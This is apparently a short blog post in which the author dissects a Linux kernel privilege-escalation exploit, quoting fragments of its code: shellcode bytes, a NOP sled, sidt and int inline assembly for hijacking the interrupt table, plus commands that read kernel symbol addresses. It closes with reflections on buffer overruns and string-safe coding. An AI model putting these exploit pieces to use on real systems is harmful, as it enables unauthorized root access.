dpkg -p linux-image-$(uname -r)
strings exploit
uname -a
cat /proc/kallsyms
man nm
static char ruleTheMachine[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";
RET
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";
IRET
asm volatile("sidt %0" : "=m"(idt));
"int $0x80\t\n"
"movl %%esi, %%esp\t\n"
sleep(1);
asm volatile("int $0xdd\t\n");
ret = uname(&buf);
printf("System info System Name - %s Release-
%s Version- %s Machine-
%s Nodename - %s Domain name - %s\n"
,buf.sysname,buf.release,buf.
version,buf.machine,
buf.nodename,buf.__domainname);
I was looking into an exploit and if you strip away the fluff, it isn't really that tricky. I have done some domination of WindWoes machines and it is not even a challenge. Linux is a little tougher, and it is odd that somebody would not check the over-run on something. Stuff happens, but you would think that if 3 people signed off on a fix that they would check for over runs. It is a an easy thing to do when coding with "C". It is one of those things that always bothered me. Programmers seem to think that there is no physicality. As an assembly programmer first it is odd to copy something without considering what is going to get over-written. The stuff above was the things I noticed about the exploit and sidt, iret, nop slide, allsyms, and then doing an int to the swapped out table.
I never created a wild exploit, but I have tested a few. It is a very complex thing and the edges of infinity can be very sharp and sometimes dangerous.
Being string safe is probably the best thing a person can do in a high level language. I have written into the instruction sequence cache before when assembly coding copy protection, but with an open OS there is no point. I found the code very interesting and I always learn a few things by figuring out how stuff works. "gcc -E" is neat as it allows you to see what the preprocessor thinks it is doing.
0 comments:
Post a Comment